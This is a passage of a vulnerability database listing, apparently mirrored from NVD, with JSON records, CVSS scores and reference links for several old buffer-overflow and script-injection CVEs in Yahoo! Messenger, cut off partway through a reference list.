yahoo messenger *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "491F3341-39C6-46FE-A5A4-DEE5839FCFD2",
              "versionEndIncluding": "5.6.0.1351",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Buffer overflow in Yahoo Instant Messenger 5.6.0.1351 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long filename in the download feature."
    },
    {
      "lang": "es",
      "value": "Desbordamiento de b\u00fafer en  Yahoo Instant Messenger 5.6.0.1351 y anteriores permite que atacantes remotos provoquen una denegaci\u00f3n de servicio (ca\u00edda) y posiblemente ejecuten c\u00f3digo arbitrario mediante un nombre de fichero largo en la opci\u00f3n de descarga."
    }
  ],
  "id": "CVE-2004-0043",
  "lastModified": "2025-04-03T01:03:51.193",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": true,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2004-02-03T05:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-January/015334.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=107357996802255\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/10573"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.osvdb.org/3437"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/9383"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id?1008651"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/14171"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-January/015334.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=107357996802255\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/10573"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.osvdb.org/3437"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/9383"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id?1008651"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/14171"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2006-10-27 16:07
Modified
2025-04-09 00:30
Severity ?
Summary
Unspecified vulnerability in Yahoo! Messenger (Service 18) before 8.1.0.195 allows remote attackers to cause a denial of service (NULL dereference and application crash) via a crafted room name in a Conference Invite. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Impacted products
Vendor Product Version
yahoo messenger 8.0



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B7178A56-42F9-44BC-8742-402480F761FA",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Unspecified vulnerability in Yahoo! Messenger (Service 18) before 8.1.0.195 allows remote attackers to cause a denial of service (NULL dereference and application crash) via a crafted room name in a Conference Invite.  NOTE: the provenance of this information is unknown; the details are obtained from third party information."
    },
    {
      "lang": "es",
      "value": "Vulnerabilidad no especificada en Yahoo! Messenger (Service 18) anterior a 8.1.0.195 permite a atacantes remotos provocar una denegaci\u00f3n de servicio (referencia a NULL y ca\u00edda de aplicaci\u00f3n) mediante un nombre de sala manipulado en una Invitaci\u00f3n de Conferencia. NOTA: la procedencia de esta informaci\u00f3n es desconocida; los detalles han sido obtenidos de informaci\u00f3n de terceros."
    }
  ],
  "id": "CVE-2006-5563",
  "lastModified": "2025-04-09T00:30:58.490",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2006-10-27T16:07:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0518.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0566.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/22510"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/449667/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/20625"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2006/4193"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0518.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0566.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/22510"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/449667/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/20625"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2006/4193"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2002-06-25 04:00
Modified
2025-04-03 01:03
Severity ?
Summary
Buffer overflow in Yahoo! Messenger 5.0 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long (1) message or (2) IMvironment field.
Impacted products
Vendor Product Version
yahoo messenger 5.0



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D6BF80C1-8F4D-40AF-88FD-D1AFDC03EC6C",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Buffer overflow in Yahoo! Messenger 5.0 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long (1) message or (2) IMvironment field."
    }
  ],
  "id": "CVE-2002-0320",
  "lastModified": "2025-04-03T01:03:51.193",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": true,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2002-06-25T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.cert.org/advisories/CA-2002-16.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.iss.net/security_center/static/8264.php"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.iss.net/security_center/static/8265.php"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/419419"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/887319"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/4162"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/4163"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.cert.org/advisories/CA-2002-16.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.iss.net/security_center/static/8264.php"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.iss.net/security_center/static/8265.php"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/419419"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/887319"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/4162"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/4163"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2002-07-26 04:00
Modified
2025-04-03 01:03
Severity ?
Summary
Yahoo! Messenger 5,0,0,1064 and earlier allows remote attackers to execute arbitrary script as other users via the addview parameter of a ymsgr URI.
Impacted products
Vendor Product Version
yahoo messenger 5.0



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D6BF80C1-8F4D-40AF-88FD-D1AFDC03EC6C",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Yahoo! Messenger 5,0,0,1064 and earlier allows remote attackers to execute arbitrary script as other users via the addview parameter of a ymsgr URI."
    }
  ],
  "id": "CVE-2002-0032",
  "lastModified": "2025-04-03T01:03:51.193",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": true,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2002-07-26T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://online.securityfocus.com/archive/1/274223"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "http://www.cert.org/advisories/CA-2002-16.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.iss.net/security_center/static/9184.php"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/172315"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.securityfocus.com/bid/4838"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://online.securityfocus.com/archive/1/274223"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "http://www.cert.org/advisories/CA-2002-16.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.iss.net/security_center/static/9184.php"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/172315"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.securityfocus.com/bid/4838"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2007-04-06 01:19
Modified
2025-04-09 00:30
Severity ?
Summary
Stack-based buffer overflow in the createAndJoinConference function in the AudioConf ActiveX control (yacscom.dll) in Yahoo! Messenger before 20070313 allows remote attackers to execute arbitrary code via long (1) socksHostname and (2) hostname properties.
References
cve@mitre.org http://messenger.yahoo.com/security_update.php?id=031207 Patch
cve@mitre.org http://osvdb.org/34319
cve@mitre.org http://secunia.com/advisories/24742 Patch, Vendor Advisory
cve@mitre.org http://securityreason.com/securityalert/2523
cve@mitre.org http://www.kb.cert.org/vuls/id/388377 US Government Resource
cve@mitre.org http://www.securityfocus.com/archive/1/464607/100/0/threaded
cve@mitre.org http://www.securityfocus.com/bid/23291 Patch, Vendor Advisory
cve@mitre.org http://www.securitytracker.com/id?1017867
cve@mitre.org http://www.vupen.com/english/advisories/2007/1219
cve@mitre.org http://www.zerodayinitiative.com/advisories/ZDI-07-012.html Patch, Vendor Advisory
cve@mitre.org https://exchange.xforce.ibmcloud.com/vulnerabilities/33408
af854a3a-2127-422b-91ae-364da2661108 http://messenger.yahoo.com/security_update.php?id=031207 Patch
af854a3a-2127-422b-91ae-364da2661108 http://osvdb.org/34319
af854a3a-2127-422b-91ae-364da2661108 http://secunia.com/advisories/24742 Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 http://securityreason.com/securityalert/2523
af854a3a-2127-422b-91ae-364da2661108 http://www.kb.cert.org/vuls/id/388377 US Government Resource
af854a3a-2127-422b-91ae-364da2661108 http://www.securityfocus.com/archive/1/464607/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108 http://www.securityfocus.com/bid/23291 Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 http://www.securitytracker.com/id?1017867
af854a3a-2127-422b-91ae-364da2661108 http://www.vupen.com/english/advisories/2007/1219
af854a3a-2127-422b-91ae-364da2661108 http://www.zerodayinitiative.com/advisories/ZDI-07-012.html Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 https://exchange.xforce.ibmcloud.com/vulnerabilities/33408
Impacted products
Vendor Product Version
yahoo messenger 8.0
yahoo messenger 8.0.0.863
yahoo messenger 8.0_2005.1.1.4
yahoo messenger 8.1.0.209
yahoo messenger 8.1.0.239



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B7178A56-42F9-44BC-8742-402480F761FA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0.0.863:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D369102-AC28-45D1-A9E7-B6C4F34529C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0_2005.1.1.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "7B4212E3-8338-430F-A9BC-A28D502B8B81",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.209:*:*:*:*:*:*:*",
              "matchCriteriaId": "7A9243F4-ADE8-4B7A-A195-EEAD41FF14EA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.239:*:*:*:*:*:*:*",
              "matchCriteriaId": "3CAF169E-8466-43EF-A03D-D49256EB2C18",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Stack-based buffer overflow in the createAndJoinConference function in the AudioConf ActiveX control (yacscom.dll) in Yahoo! Messenger before 20070313 allows remote attackers to execute arbitrary code via long (1) socksHostname and (2) hostname properties."
    },
    {
      "lang": "es",
      "value": "Desbordamiento de b\u00fafer en la funci\u00f3n createAndJoinConference en el control ActiveX AudioConf (yacscom.dll) en Yahoo! Messenger anterior a 20070313 permite a atacantes remotos ejecutar c\u00f3digo de su elecci\u00f3n a trav\u00e9s de las propiedades (1) socksHostname y (2) hostname."
    }
  ],
  "id": "CVE-2007-1680",
  "lastModified": "2025-04-09T00:30:58.490",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 9.3,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 10.0,
        "obtainAllPrivilege": true,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2007-04-06T01:19:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://messenger.yahoo.com/security_update.php?id=031207"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/34319"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/24742"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securityreason.com/securityalert/2523"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/388377"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/464607/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.securityfocus.com/bid/23291"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id?1017867"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2007/1219"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.zerodayinitiative.com/advisories/ZDI-07-012.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/33408"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://messenger.yahoo.com/security_update.php?id=031207"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/34319"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/24742"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securityreason.com/securityalert/2523"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/388377"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/464607/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.securityfocus.com/bid/23291"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id?1017867"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2007/1219"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.zerodayinitiative.com/advisories/ZDI-07-012.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/33408"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2007-06-11 18:30
Modified
2025-04-09 00:30
Severity ?
Summary
Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method.
References
cve@mitre.org http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063819.html Exploit
cve@mitre.org http://messenger.yahoo.com/security_update.php?id=060707 Patch
cve@mitre.org http://osvdb.org/37081
cve@mitre.org http://research.eeye.com/html/advisories/published/AD20070608.html Vendor Advisory
cve@mitre.org http://research.eeye.com/html/advisories/upcoming/20070605.html Vendor Advisory
cve@mitre.org http://secunia.com/advisories/25547 Patch, Vendor Advisory
cve@mitre.org http://securitytracker.com/id?1018204 Exploit
cve@mitre.org http://www.kb.cert.org/vuls/id/932217 Patch, US Government Resource
cve@mitre.org http://www.securityfocus.com/archive/1/470861/100/0/threaded
cve@mitre.org http://www.securityfocus.com/bid/24341
cve@mitre.org http://www.securityfocus.com/bid/24355 Exploit
cve@mitre.org http://www.securitytracker.com/id?1018203
cve@mitre.org http://www.vupen.com/english/advisories/2007/2094
cve@mitre.org https://exchange.xforce.ibmcloud.com/vulnerabilities/34759
cve@mitre.org https://www.exploit-db.com/exploits/4043
af854a3a-2127-422b-91ae-364da2661108 http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063819.html Exploit
af854a3a-2127-422b-91ae-364da2661108 http://messenger.yahoo.com/security_update.php?id=060707 Patch
af854a3a-2127-422b-91ae-364da2661108 http://osvdb.org/37081
af854a3a-2127-422b-91ae-364da2661108 http://research.eeye.com/html/advisories/published/AD20070608.html Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 http://research.eeye.com/html/advisories/upcoming/20070605.html Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 http://secunia.com/advisories/25547 Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 http://securitytracker.com/id?1018204 Exploit
af854a3a-2127-422b-91ae-364da2661108 http://www.kb.cert.org/vuls/id/932217 Patch, US Government Resource
af854a3a-2127-422b-91ae-364da2661108 http://www.securityfocus.com/archive/1/470861/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108 http://www.securityfocus.com/bid/24341
af854a3a-2127-422b-91ae-364da2661108 http://www.securityfocus.com/bid/24355 Exploit
af854a3a-2127-422b-91ae-364da2661108 http://www.securitytracker.com/id?1018203
af854a3a-2127-422b-91ae-364da2661108 http://www.vupen.com/english/advisories/2007/2094
af854a3a-2127-422b-91ae-364da2661108 https://exchange.xforce.ibmcloud.com/vulnerabilities/34759
af854a3a-2127-422b-91ae-364da2661108 https://www.exploit-db.com/exploits/4043
Impacted products
Vendor Product Version
yahoo messenger 2.0.1.4
yahoo messenger 8.0
yahoo messenger 8.0.0.863
yahoo messenger 8.0.1
yahoo messenger 8.0_2005.1.1.4
yahoo messenger 8.1.0.249



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:2.0.1.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "6944C050-C328-45DB-B2C3-0CA43C0D790C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B7178A56-42F9-44BC-8742-402480F761FA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0.0.863:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D369102-AC28-45D1-A9E7-B6C4F34529C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "012BF14B-1009-4BDE-A699-C5989F576199",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0_2005.1.1.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "7B4212E3-8338-430F-A9BC-A28D502B8B81",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.249:*:*:*:*:*:*:*",
              "matchCriteriaId": "15660D84-B392-457E-B433-9B9180A49B3E",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method."
    },
    {
      "lang": "es",
      "value": "El desbordamiento del b\u00fafer en el control ActiveX de Yahoo! Webcam Viewer en ywcvwr.dll versi\u00f3n 2.0.1.4 para Yahoo! Messenger versi\u00f3n 8.1.0.249 permite a los atacantes remotos ejecutar c\u00f3digo arbitrario por medio de un valor largo propiedad del servidor para el m\u00e9todo de recepci\u00f3n."
    }
  ],
  "id": "CVE-2007-3148",
  "lastModified": "2025-04-09T00:30:58.490",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 9.3,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 10.0,
        "obtainAllPrivilege": true,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2007-06-11T18:30:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063819.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://messenger.yahoo.com/security_update.php?id=060707"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/37081"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
